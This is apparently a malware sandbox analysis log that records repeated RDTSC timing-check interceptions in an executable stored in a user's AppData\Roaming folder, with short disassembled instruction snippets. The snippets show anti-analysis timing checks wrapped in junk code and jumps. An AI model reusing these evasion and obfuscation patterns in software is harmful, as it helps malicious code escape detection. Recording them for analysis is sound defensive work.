Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F30076 second address: 4F3007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F3007C second address: 4F300A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F300A1 second address: 4F300A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F300A5 second address: 4F300C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60E5F second address: 4F60E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A6Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F401CD second address: 4F40226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC310h 0x00000009 sub ecx, 7B117458h 0x0000000f jmp 00007F5828CEC30Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5828CEC318h 0x0000001b or ah, FFFFFFB8h 0x0000001e jmp 00007F5828CEC30Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40226 second address: 4F4022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4022D second address: 4F4026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC315h 0x00000009 jmp 00007F5828CEC30Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC310h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4026B second address: 4F4027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4027A second address: 4F4029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e jmp 00007F5828CEC30Ah 0x00000013 and dword ptr [eax], 00000000h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4029B second address: 4F402A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F402A1 second address: 4F40304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC312h 0x00000009 add ah, 00000068h 0x0000000c jmp 00007F5828CEC30Bh 0x00000011 popfd 0x00000012 jmp 00007F5828CEC318h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e pushad 0x0000001f mov si, 839Dh 0x00000023 mov dx, cx 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov di, A0A4h 0x0000002f jmp 00007F5828CEC30Dh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2054F second address: 4F20553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20553 second address: 4F20559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F20559 second address: 4F2055F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2055F second address: 4F20563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40016 second address: 4F4001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4001A second address: 4F40020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40020 second address: 4F40026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40026 second address: 4F4002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4002A second address: 4F40058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5828704A74h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5828704A6Eh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40058 second address: 4F4005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F4005E second address: 4F40062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40062 second address: 4F40088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov ax, bx 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5828CEC30Dh 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F40088 second address: 4F4009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F6067F second address: 4F60685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60685 second address: 4F606BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5828704A72h 0x00000008 pop esi 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5828704A78h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606BB second address: 4F606DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5828CEC30Fh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606DC second address: 4F606E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606E0 second address: 4F606E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606E4 second address: 4F606EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606EA second address: 4F606F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606F0 second address: 4F606F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606F4 second address: 4F606F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F606F8 second address: 4F60711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5828704A6Eh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60711 second address: 4F60717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60717 second address: 4F6071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F6071B second address: 4F6074A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F5828CEC319h 0x0000000e mov eax, dword ptr [76FA65FCh] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ecx, 7D8FF139h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F6074A second address: 4F6078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c jmp 00007F5828704A77h 0x00000011 je 00007F589A6C7C4Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx ebx, si 0x0000001d movzx eax, dx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F6078E second address: 4F60794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60794 second address: 4F60798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60798 second address: 4F607B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5828CEC313h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F607B7 second address: 4F607BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F607BD second address: 4F607C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F607C1 second address: 4F60838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov dl, 8Ah 0x00000011 call 00007F5828704A6Eh 0x00000016 pop esi 0x00000017 popad 0x00000018 and ecx, 1Fh 0x0000001b pushad 0x0000001c movsx ebx, cx 0x0000001f push ecx 0x00000020 jmp 00007F5828704A6Bh 0x00000025 pop ecx 0x00000026 popad 0x00000027 ror eax, cl 0x00000029 jmp 00007F5828704A6Fh 0x0000002e leave 0x0000002f jmp 00007F5828704A76h 0x00000034 retn 0004h 0x00000037 nop 0x00000038 mov esi, eax 0x0000003a lea eax, dword ptr [ebp-08h] 0x0000003d xor esi, dword ptr [007B2014h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push eax 0x00000046 lea eax, dword ptr [ebp-10h] 0x00000049 push eax 0x0000004a call 00007F582CEF529Eh 0x0000004f push FFFFFFFEh 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F5828704A6Ah 0x0000005a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60838 second address: 4F6083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F6083C second address: 4F60842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60842 second address: 4F60876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 7B2FD2A3h 0x00000008 mov esi, 37E2F5FFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 mov esi, 640AAA93h 0x00000019 popad 0x0000001a ret 0x0000001b nop 0x0000001c push eax 0x0000001d call 00007F582D4DCB6Ch 0x00000022 mov edi, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F5828CEC315h 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F60876 second address: 4F608E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007F5828704A74h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F5828704A6Dh 0x0000001c sub ecx, 43CC7366h 0x00000022 jmp 00007F5828704A71h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F5828704A70h 0x0000002e add ax, BB08h 0x00000033 jmp 00007F5828704A6Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F608E4 second address: 4F60912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828CEC30Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10147 second address: 4F10238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828704A6Fh 0x00000009 sbb ax, 0DFEh 0x0000000e jmp 00007F5828704A79h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F5828704A77h 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F5828704A70h 0x00000027 or ax, 0F58h 0x0000002c jmp 00007F5828704A6Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebx, dword ptr [ebp+10h] 0x00000036 jmp 00007F5828704A76h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F5828704A6Eh 0x00000043 or cl, FFFFFFE8h 0x00000046 jmp 00007F5828704A6Bh 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 push eax 0x00000051 jmp 00007F5828704A75h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F5828704A6Eh 0x0000005c mov esi, dword ptr [ebp+08h] 0x0000005f jmp 00007F5828704A70h 0x00000064 xchg eax, edi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov si, bx 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10238 second address: 4F1023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F1023E second address: 4F1024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F1024D second address: 4F10251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10251 second address: 4F10260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10260 second address: 4F10278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC314h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10278 second address: 4F102A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov dl, al 0x0000000c popad 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov cx, 9629h 0x00000017 popad 0x00000018 je 00007F589A712DEBh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5828704A6Bh 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F102A3 second address: 4F102E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ah, AAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5828CEC314h 0x0000001b add ecx, 6B0DA258h 0x00000021 jmp 00007F5828CEC30Bh 0x00000026 popfd 0x00000027 mov eax, 0A676B0Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F102E5 second address: 4F102F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A70h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F102F9 second address: 4F102FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F102FD second address: 4F10379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F589A712D8Ch 0x0000000e jmp 00007F5828704A77h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 jmp 00007F5828704A76h 0x0000001b or edx, dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 7A981660h 0x00000026 pushfd 0x00000027 jmp 00007F5828704A79h 0x0000002c sbb ecx, 29A9B366h 0x00000032 jmp 00007F5828704A71h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10379 second address: 4F10389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10389 second address: 4F103FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007F5828704A77h 0x00000013 jne 00007F589A712D40h 0x00000019 jmp 00007F5828704A76h 0x0000001e test byte ptr [esi+48h], 00000001h 0x00000022 jmp 00007F5828704A70h 0x00000027 jne 00007F589A712D29h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007F5828704A6Dh 0x00000035 pop eax 0x00000036 mov edi, 5C8CAEA4h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F007C7 second address: 4F00850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov dx, ax 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push ecx 0x00000016 movsx edx, si 0x00000019 pop eax 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007F5828CEC315h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F5828CEC30Ah 0x0000002c or cx, 2B98h 0x00000031 jmp 00007F5828CEC30Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 pop edi 0x00000039 popad 0x0000003a pushad 0x0000003b mov ax, D761h 0x0000003f push eax 0x00000040 pop edi 0x00000041 popad 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F5828CEC313h 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, cx 0x00000050 mov dh, cl 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00850 second address: 4F00856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00856 second address: 4F0085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F0085A second address: 4F0089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5828704A6Ah 0x00000010 jmp 00007F5828704A75h 0x00000015 popfd 0x00000016 mov ax, 4BF7h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5828704A6Fh 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F0089E second address: 4F008BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F008BB second address: 4F008C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 666E0E92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F008C5 second address: 4F008D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov esi, 665B47B7h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F008D6 second address: 4F00922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5828704A6Dh 0x00000015 sub ax, 9AC6h 0x0000001a jmp 00007F5828704A71h 0x0000001f popfd 0x00000020 mov si, 0377h 0x00000024 popad 0x00000025 rdtsc
